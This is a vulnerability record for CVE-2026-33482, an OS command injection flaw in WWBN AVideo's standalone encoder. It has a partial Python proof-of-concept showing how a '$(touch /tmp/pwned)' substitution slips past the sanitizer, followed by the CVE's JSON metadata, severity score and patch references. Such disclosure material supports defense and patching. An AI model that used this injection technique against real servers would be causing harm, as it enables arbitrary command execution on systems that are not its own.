CVE-2026-33482

# PoC Concept for CVE-2026-33482 # This demonstrates how to bypass the sanitizeFFmpegCommand filter. # The application strips characters like ; | && but misses $(). import requests target_url = "http://target-site/plugin/API/standAlone.php" # The payload injects a command using $() syntax. # Example: Creating a file named 'pwned' to prove execution. # Note: The actual parameter name and encryption method depend on the app config. malicious_cmd = "$(touch /tmp/pwned)" # Assume 'videoUrl' or similar parameter is passed to ffmpeg # The payload would be: "normal_input $(touch /tmp/pwned)" payload = f"input.mp4 {malicious_cmd}" # In a real exploit, this payload would need to be encrypted # as expected by the AVideo standalone encoder API. data = { "encryptedPayload": "<encrypted_representation_of_payload>" } # response = requests.post(target_url, data=data) # print("Check /tmp/pwned on the server to verify RCE")

{"cve": {"id": "CVE-2026-33482", "sourceIdentifier": "[email protected]", "published": "2026-03-23T15:16:34.560", "lastModified": "2026-03-24T18:41:00.410", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `sanitizeFFmpegCommand()` function in `plugin/API/standAlone/functions.php` is designed to prevent OS command injection in ffmpeg commands by stripping dangerous shell metacharacters (`&&`, `;`, `|`, `` ` ``, `<`, `>`). However, it fails to strip `$()` (bash command substitution syntax). Since the sanitized command is executed inside a double-quoted `sh -c` context in `execAsync()`, an attacker who can craft a valid encrypted payload can achieve arbitrary command execution on the standalone encoder server. Commit 25c8ab90269e3a01fb4cf205b40a373487f022e1 contains a patch."}, {"lang": "es", "value": "WWBN AVideo es una plataforma de video de código abierto. En versiones hasta la 26.0 inclusive, la función 'sanitizeFFmpegCommand()' en 'plugin/API/standAlone/functions.php' está diseñada para prevenir la inyección de comandos del sistema operativo en comandos ffmpeg eliminando metacaracteres peligrosos del shell ('&amp;&amp;', ';', '|', '`', '&lt;', '&gt;'). Sin embargo, no logra eliminar '$()' (sintaxis de sustitución de comandos de bash). Dado que el comando saneado se ejecuta dentro de un contexto 'sh -c' entre comillas dobles en 'execAsync()', un atacante que puede crear una carga útil cifrada válida puede lograr la ejecución arbitraria de comandos en el servidor codificador independiente. El commit 25c8ab90269e3a01fb4cf205b40a373487f022e1 contiene un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndIncluding": "26.0", "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/25c8ab90269e3a01fb4cf205b40a373487f022e1", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-pmj8-r2j7-xg6c", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}